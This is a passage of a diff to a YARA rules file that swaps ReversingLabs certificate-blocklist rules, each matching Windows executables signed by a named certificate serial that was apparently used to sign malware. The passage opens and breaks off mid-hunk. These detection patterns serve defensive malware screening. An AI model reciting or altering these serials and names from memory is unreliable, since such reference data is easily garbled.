+		logic_hash = "8c803111df930056bdc3ef7560f07bf4d255b93286d01ecc55f790e72565ba5d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20719,21 +45384,21 @@ rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AEEPZ Limited" and pe.signatures [ i ] . serial == "09:3f:f2:87:0f:a3:3e:af:47:25:94:57:ee:58:c2:e0" and 1503532800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Diamartis" and pe.signatures [ i ] . serial == "7f:ba:0e:19:91:9a:c5:0d:70:0b:a6:02:50:d0:2c:8b" and 1623196800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ca5b9ec0-2c46-50db-bc47-b3c6c61e990e"
+		id = "cc8c0cca-1848-5a5e-a421-c5ecdea6ba53"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16008-L16024"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a160ada48048e11632082e7538459554d77d31539e53709cd897f3c454af8236"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9038-L9056"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dcb1ac4c7dcbebd0a432515da82e4a97be6c6c2a54f9d642aa8c1a2bcbdce5de"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20743,21 +45408,21 @@ rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "71:9c:17:a8:23:83:9d:ca:81:3e:e8:58:88:b3:b3:9a" and 1479686400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) and 1623628800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "24741dc7-6252-5964-a69f-bef4b2dfe1a7"
+		id = "e85434e1-1ef5-5660-8ba6-b35cbbe7510d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16026-L16042"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f24cdf890bd0b51a83ca333c37bc22068ab1f7e7ef36b36d94a133773097bd37"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9058-L9074"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "22cb71eebbb212a4436847c11c7ca9cefaf118086b024014c12498a6a5953af5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20767,21 +45432,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dening Hu" and pe.signatures [ i ] . serial == "6d:c8:6e:bf:58:63:56:8e:22:37:b2:d8:95:82:d7:05" and 1471305600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "37:a6:7c:f7:54:ee:5a:e2:84:b4:cf:8b:9d:65:16:04" and 1617321600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9265bb94-b183-523f-91bf-9bc76ab63d6b"
+		id = "7ec33498-b299-58e0-be42-9e4fb9549e28"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16044-L16060"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "96269f41f82621aee029f343acfce70c781bf7713588dfe78fac35a3d1d3f7cd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9076-L9092"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "61c49c60fc4fd5d654a6376fcee43e986a5351f085a5652a3c8888774557e053"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20791,21 +45456,21 @@ rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "21:4d:f5:9f:e5:38:74:cc:01:1d:d4:57:27:03:5f:51" and 1468800000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" and 1619654400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9dd87769-73d0-5299-b6ed-936703abc78e"
+		id = "b7830a3a-ddcc-54ef-84dd-5d4b13863f90"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16062-L16078"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "190dffc36c17c27c43337d7914683b7bab3ff18a50de5278ed2a66f04b9e395d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9094-L9110"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "788abb53ed7974d87c1b1bdbe31dcd3e852ea64745d94780d78d1217ee0206fe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20815,21 +45480,21 @@ rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aleman Ltd" and pe.signatures [ i ] . serial == "37:ca:4f:66:fd:cc:87:32:99:27:23:19:98:59:88:6c" and 1505952000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade By International ApS" and pe.signatures [ i ] . serial == "7a:6d:30:a6:eb:2f:a0:c3:36:92:83:72:57:04:ac:4c" and 1619568000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d5ca9d9d-e80f-56c1-90b7-ef931e61ba92"
+		id = "210a0c72-7eb7-5c78-bf5b-1ac292e7fa11"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16080-L16098"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cd99e4d97d9a60f409cf072bbae254486c307ae3cb6e34c5cd9648c972615f36"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9112-L9128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3b1e244b5f543a05beb2475020aa20dfc723f4dce3a5a0a963db1672d3295721"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20839,21 +45504,21 @@ rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) and 1676246400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" and 1622160000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1aebd2be-b22c-5102-a449-27025f61cce6"
+		id = "9718f290-6ecd-5d67-9013-af99f98fffef"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16100-L16118"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f57ae32d7efd9cd4c0a207897e30b871dc32405c5b9ad844c9bb7eee4827cc5a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9130-L9146"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4022abb8efbda944e35ff529c5b3b3c9f6370127a945f3eec1310149bb5d06e4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20863,21 +45528,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and ( pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" or pe.signatures [ i ] . serial == "fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" ) and 1604361600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRO SAT SRL" and pe.signatures [ i ] . serial == "0e:8a:a3:28:af:20:7c:e8:bc:ae:1d:c1:5c:62:61:88" and 1627344000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8a6f4a15-08a5-5ca5-a743-55075726e744"
+		id = "844e295f-b22f-5eb0-9f98-0d6e574d2954"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16120-L16136"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b29bc69c8fd9543dba8f7d2a18d52b1bcbb8a8ae6f553d8b232ca74709b9addc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9148-L9166"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d8005774e6011d8198039a6588834cd0b13dd728103b63c3ea8b6e0dc3878f05"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20887,21 +45552,21 @@ rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" and 1675070541 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sistema LLC" and ( pe.signatures [ i ] . serial == "00:cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" or pe.signatures [ i ] . serial == "cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" ) and 1627430400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aca9ac98-1c3b-5231-b6e5-97e3b8fec6de"
+		id = "84140bbd-23a0-5355-9d1a-918cc93c3352"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16138-L16154"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f7ccfadab650ae3b6f950c9d1b35f86aa4a4e6c05479c014ab18881a405678f0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9168-L9184"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c9444ff9e13192bf300afac12554bc4cc2defb37bb5b57906b6163db378c515a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20911,21 +45576,21 @@ rule REVERSINGLABS_Cert_Blocklist_391Ae38670Ab188A5De26E07 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "39:1a:e3:86:70:ab:18:8a:5d:e2:6e:07" and 1540832872 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIA \"MWorx\"" and pe.signatures [ i ] . serial == "7e:bc:b5:4b:7e:0e:64:10:b2:86:10:de:07:43:d4:dd" and 1625616000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5acd2e61-1c04-5cc5-8773-25856fc163c4"
+		id = "1ec81090-91a1-5019-be91-14f60d6722fc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16156-L16174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5fdaf01c6a23057ab976e3ad2a8b40558b16693161410b0f30d7b884de7e3985"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9186-L9202"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "81e19c06de4546a2cee974230ef7aa15291f20f2e6b6f89c9b12107c26836b5e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20935,21 +45600,21 @@ rule REVERSINGLABS_Cert_Blocklist_D08D83Ff118Df3777E371C5C482Cce7B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" or pe.signatures [ i ] . serial == "d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" ) and 1444780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DMR Consulting Ltd." and pe.signatures [ i ] . serial == "01:10:6c:c2:93:77:2c:a9:05:a2:b6:ef:f0:2b:f0:f5" and 1627084800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "21c16e2c-bc0c-5e1d-bc44-6d7c4afc34cb"
+		id = "82b2198e-140a-54d0-afa8-ad89980c7899"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16176-L16192"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24474c4033a8cad1690160da64b75a1eec570f56e830967256c19574bde59384"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9204-L9220"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d2fcbce0826c1478338827376d2c7869e5b38dc6d5e737a2f986600c6f71b1e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20959,21 +45624,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "06:ce:20:94:77:f1:ac:19:a2:04:9b:dc:58:46:a8:31" and 1426710344 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wellpro Impact Solutions Oy" and pe.signatures [ i ] . serial == "05:bb:16:2f:6e:fe:85:2b:7b:d4:71:2f:d7:37:a6:1e" and 1628726400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a3ee3618-0e20-5d9c-a514-9020607bd1b0"
+		id = "f81697ca-e49a-5a3d-9e0f-6192159e098b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16194-L16210"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f473a939d1a27cf53c09d0e4a3753a9444ae3674a55d5b0feafeef6b75dd487f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9222-L9238"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e922bb850b7c5c70db80e6a2b99310eac48d3b10b94a7259899facd681916bfa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20983,21 +45648,21 @@ rule REVERSINGLABS_Cert_Blocklist_447F449121B883211663B7B7E2Ead868 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "44:7f:44:91:21:b8:83:21:16:63:b7:b7:e2:ea:d8:68" and 1443052800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and pe.signatures [ i ] . serial == "61:71:99:0b:a1:c8:e7:10:49:eb:b2:96:a3:5b:d1:60" and 1620000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "77d6756b-e948-5771-9ec1-f5159b0e792c"
+		id = "7d112cb8-a29f-5560-9c3c-cd8891623d96"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16212-L16228"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dcdfb78d4d779b1cabcdf5b2da1fa27aaa9faaed4d4967630ce45f30304fe227"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9240-L9256"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "241fe5a9f233fa36a665d22b38fd360bee21bc9832c15ac9c9d9b17adc3bb306"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21007,21 +45672,21 @@ rule REVERSINGLABS_Cert_Blocklist_6366A9Ac97Df4De17366943C9B291Aaa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "xlgames" and pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" and 1326796477 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCH CONSULTANTS LTD" and pe.signatures [ i ] . serial == "21:14:ca:3b:d2:af:d6:3d:7f:a2:9d:74:49:92:b0:43" and 1625097600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2fc1303f-e559-59ba-a1b9-b74a154d8805"
+		id = "dd6dca76-ff5b-51a8-9318-20a88eb44ffb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16230-L16246"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a563f1485ae8887c46f45d1366f676894c7db55954671825b37372f786ce0d3d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9258-L9274"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7ba7f69514230fe636efc0a12fb9ac489a5a80ca1f5bcdb050dd30ee8f69659c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21031,21 +45696,21 @@ rule REVERSINGLABS_Cert_Blocklist_66E3F0B4459F15Ac7F2A2B44990Dd709 : INFO FILE
 		importance = 25
 
 	condition:
